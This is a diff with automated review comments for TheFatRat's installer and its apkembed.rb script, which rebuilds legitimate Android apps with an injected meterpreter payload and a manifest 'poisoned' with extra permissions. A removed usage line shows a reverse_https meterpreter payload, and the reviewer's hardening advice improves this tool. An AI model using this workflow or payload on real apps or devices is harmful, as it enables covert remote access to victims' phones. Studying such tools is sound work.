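        echo "[ ! ] Installing $pkgs from your apt sources"
        xterm -T "☣ INSTALL $label ☣" -geometry 100x30 -e "sudo apt-get install $pkgs -y"
    fi
    # Re-check after the install attempt so the log reflects what is really on PATH.
    if command -v "$cmd" >> "$log" 2>&1; then
        echo "[ ✔ ] $label [ found ]"
    else
        echo "[ X ] $label still missing after install" | tee -a "$log"
    fi
    sleep 2
}

# ... unchanged: earlier tool checks (xterm, zenity, gcc, ...) ...
ensure_tool keytool   "default-jre default-jdk" "Keytool (java)"
ensure_tool jarsigner "default-jdk"             "Jarsigner (java)"
ensure_tool unzip     "unzip"                   "Unzip"
ensure_tool aapt      "aapt"                    "Aapt"
ensure_tool zipalign  "zipalign"                "Zipalign"
```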
@@ -193,41 +304,63 @@ echo 'deb-src http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/s echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list sleep 2 -xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" +xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" >>$log 2>&1 #Checking if apktool exists which apktool > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Apktool...........................[ found ]" +which apktool >> $log 2>&1 sleep 2 else -echo "[ X ] Apktool -> not found ]" -echo "[ ! ] Installing apktool from Kali repositories ]" +echo "[ X ] Apktool -> not found " +echo "[ ! ] Installing apktool from Kali repositories " xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install apktool --force-yes -y" echo "[ ✔ ] Done installing ...." +which apktool >> $log 2>&1 sleep 2 fi +#Checking if dex2jar exists +which d2j-jar2dex > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo "[ ✔ ] Dex2Jar...........................[ found ]" +which d2j-jar2dex >> $log 2>&1 +sleep 2 +else +echo "[ X ] Dex2jar -> not found " +echo "[ ! ] Installing dex2jar from Kali repositories " +xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install dex2jar --force-yes -y" +echo "[ ✔ ] Done installing ...." +which d2j-jar2dex >> $log 2>&1 +sleep 2 +fi + +#installing dependencies for ruby script +echo "[ ! ] Installing dedepndencies for ruby script from Kali repositories " +xterm -T "☣ INSTALL DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install zlib1g-dev libmagickwand-dev imagemagick -y" +echo "[ ✔ ] Done installing ...." +sleep 2 # check if metasploit-framework its installed which msfconsole > /dev/null 2>&1 if [ "$?" 
-eq "0" ]; then echo "[ ✔ ] Metasploit-Framework..............[ found ]" # msf was detected , removing config file in case setup was already configured before -rm -f config.path +rm -f $config #Creating new config file based on last detection of msf -touch config.path -echo "********************************************************************************************************" >> config.path -echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path -echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path -echo "********************************************************************************************************" >> config.path -echo "msfconsole" >> config.path -echo "msfvenom" >> config.path +touch $config +echo "********************************************************************************************************" >> $config +echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config +echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config +echo "********************************************************************************************************" >> $config +echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 sleep 2 else echo "" -echo "[ X ] metasploit-framework -> not found ]" +echo "[ X ] metasploit-framework -> not found " # Providing manual input to user in case metasploit was installed from git and is not on system path echo "" 
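Review bot: The new dex2jar block installs with `apt-get install dex2jar --force-yes -y`, copying the flag from the apktool line above it, and `--force-yes` tells apt to proceed even when packages cannot be authenticated. The context lines show the Kali repositories being appended to `/etc/apt/sources.list` over plain `http://`, so on a non-Kali system without the archive key this installs unverified packages as root. I would drop `--force-yes` from both lines and install the repository's signing key first, so that a signature failure stops the setup rather than being overridden. Two smaller points in the same hunk: `>>$log 2>&1` on the `xterm ... -e "sudo apt-get update"` line captures xterm's own output rather than apt's, and the dex2jar window title still reads "INSTALL APKTOOOL". The hunk also adds the typo "dedepndencies".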
@@ -237,39 +370,39 @@ read -p "Press Y/y to config metasploit-framework path or N/n to install it from case "$choice" in y|Y) -rm -f config.path -touch config.path -echo "********************************************************************************************************" >> config.path -echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path -echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path -echo "********************************************************************************************************" >> config.path +rm -f $config +touch $config +echo "********************************************************************************************************" >> $config +echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config +echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config +echo "********************************************************************************************************" >> $config clear -echo "Enter the path of your Metasploit Instalation or just press enter for default config ." -echo -e $white "Ex:(/opt/metasploit-framework)"; -read -p "Path:" msfc +echo -e $white "Enter the path of your Metasploit Instalation or just press enter for default config : +ex:(/opt/metasploit-framework)"; +read -p "Path: " msfc if [[ -z "$msfc" ]]; then -echo "msfconsole" >> config.path -echo "msfvenom" >> config.path +echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 else -echo "ruby $msfc/msfconsole" >> config.path -echo "ruby $msfc/msfvenom" >> config.path +echo "ruby $msfc/msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "ruby $msfc/msfvenom" | tee -a $config $log > /dev/null 2>&1 fi ;; n|N) -echo "[ ! 
] Installing metasploit-framework from kali repositories ]" +echo "[ ! ] Installing metasploit-framework from kali repositories " xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y" echo "[ ✔ ] Done installing ...." -rm -f config.path -touch config.path -echo "********************************************************************************************************" >> config.path -echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path -echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path -echo "********************************************************************************************************" >> config.path +rm -f $config +touch $config +echo "********************************************************************************************************" >> $config +echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config +echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config +echo "********************************************************************************************************" >> $config # adding the msf startups automatically to config file -echo "msfconsole" >> config.path -echo "msfvenom" >> config.path +echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 ;; *) 
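Review bot: The value read into `msfc` is written to the config as `ruby $msfc/msfconsole` with no check that the directory or the two files exist. The config header describes these lines as the tool paths the program depends on, so presumably they are run as commands later, and a typo or a path containing spaces would then fail far from where it was entered. Validate before writing, e.g. `[[ -f "$msfc/msfconsole" && -f "$msfc/msfvenom" ]] || { echo "msfconsole/msfvenom not found in $msfc"; exit 1; }`, and read with `read -r -p "Path: " msfc` so backslashes are kept literally. The backdoor-factory and searchsploit prompts in the later hunks write `$backdoor` and `$searchsploit` the same way. The enclosing `case` starts and ends outside this hunk.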
@@ -282,25 +415,24 @@ fi which backdoor-factory > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Backdoor-Factory..................[ found ]" -echo "backdoor-factory" >> config.path +echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 sleep 2 else -echo "[ X ] backdoor-factory -> not found ]" +echo "[ X ] backdoor-factory -> not found " echo "" -echo -e $white "[This script requires backdoor-factory - , do you want to setup its path manually ?]"; +echo -e $white "[This script requires backdoor-factory , do you want to setup its path manually ?]"; read -p "[Press Y/y to setup backdoor-factory path or N/n to install it from Kali repositories . ]" choice1 case "$choice1" in y|Y ) clear -echo -e $white "Enter the path for backdoor.py ex:(/opt/backdoor-factory/backdoor.py) -, or just press [ENTER] for default config : "; -read -p "Path:" backdoor +echo -e $white "Enter the path for backdoor.py , or just press [ENTER] for default config : +ex:(/opt/backdoor-factory/backdoor.py)"; +read -p "Path: " backdoor if [[ -z "$backdoor" ]]; then -echo "backdoor-factory" >> config.path +echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 else -echo "python2 $backdoor" >> config.path +echo "python2 $backdoor" | tee -a $config $log > /dev/null 2>&1 fi ;; @@ -308,7 +440,7 @@ fi echo "[ ! ] Installing backdoor-factory from kali repositories ]" xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y" echo "[ ✔ ] Done installing ...." -echo "backdoor-factory" >> config.path +echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 ;; *) 
@@ -316,13 +448,12 @@ echo "Invalid Input (Choose y/Y or n/N only)" ;; esac; fi -sleep 2 # check if searchsploit exists which searchsploit > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Searchsploit......................[ found ]" -echo "searchsploit" >> config.path +echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 sleep 2 else echo "[ X ] searchsploit -> not found]" @@ -333,13 +464,13 @@ case "$choice2" in y|Y ) clear -echo -e $yellow "Enter the path for searchsploit ex:(/opt/searchsploit/searchsploit) -, or just press [ENTER] for default config : " +echo -e $white "Enter the path for searchsploit , or just press [ENTER] for default config : +ex:(/opt/searchsploit/searchsploit) " read -p "Path: " searchsploit if [[ -z "$searchsploit" ]]; then -echo "searchsploit" >> config.path +echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 else -echo "bash $searchsploit" >> config.path +echo "bash $searchsploit" | tee -a $config $log > /dev/null 2>&1 fi ;; @@ -347,7 +478,7 @@ n|N ) echo "[ ! ] Installing searchsploit from kali repositories ]" xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y" echo "[ ✔ ] Done installing ...." -echo "searchsploit" >> config.path +echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 sleep 2 echo "" echo "Configuration and tool installed with success!"; @@ -383,7 +514,7 @@ rm -f /usr/local/sbin/fatrat touch /usr/local/sbin/fatrat echo "#!/bin/bash" > /usr/local/sbin/fatrat echo $scrp >> /usr/local/sbin/fatrat -chmod +x /usr/local/sbin/fatrat +chmod +x /usr/local/sbin/fatrat clear echo ""; echo "[ ]====================================================================[ ]"; @@ -391,6 +522,7 @@ echo ""; echo "[ ]====================================================================[ ]"; echo ""; chmod +x fatrat + which fatrat >> $log 2>&1 sleep 2 ;; diff --git a/tools/apkembed.rb b/tools/apkembed.rb index f69454f..92c8ba1 100644 --- a/tools/apkembed.rb 
+++ b/tools/apkembed.rb @@ -89,8 +89,8 @@ def fix_manifest() } original_permissions=[] apk_mani='' - - #Load original apk's permissions + + #Load original apk's permissions File.open("output/original/AndroidManifest.xml","r"){|file2| k=File.read(file2) apk_mani=k @@ -152,29 +152,6 @@ unless(apk_v.split()[1].include?("v2.")) exit(1) end -begin - msfvenom_opts = ARGV[1,ARGV.length] - opts="" - msfvenom_opts.each{|x| - opts+=x - opts+=" " - } -rescue - puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" - puts "[-] Error parsing msfvenom options. Exiting.\n" - exit(1) -end - - - -print "[*] Generating msfvenom payload..\n" -res=`msfvenom -f raw #{opts} -o output/payload.apk ` -if res.downcase.include?("invalid" || "error") - puts res - exit(1) -end - print "[*] Signing payload..\n" `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'output/payload.apk' androiddebugkey` @@ -183,7 +160,7 @@ print "[*] Signing payload..\n" `cp #{apkfile} output/original.apk` -print "[*] Decompiling orignal APK..\n" +print "[*] Decompiling original APK..\n" `apktool d output/original.apk -o output/original` print "[*] Decompiling payload APK..\n" `apktool d output/payload.apk -o output/payload` @@ -226,7 +203,7 @@ print "[*] Poisoning the manifest with meterpreter permissions..\n" fix_manifest() print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" -`apktool b -o output/#{injected_apk} output/original` +`apktool b -o #{injected_apk} output/original` print "[*] Signing #{injected_apk} ..\n" `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`
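Review bot: `injected_apk` is interpolated into a backtick command in the changed `apktool b -o #{injected_apk} output/original` line, so the shell parses the file name, and the command's exit status is never checked before the signing step runs. Passing an argument list avoids the shell and makes a failure visible: `system("apktool", "b", "-o", injected_apk, "output/original") or abort("[-] apktool build failed")`. The jarsigner call on the following line has the same shape. `injected_apk` is assigned outside this hunk, so it should be confirmed that the value now carries the intended output directory, since the `output/` prefix was removed here.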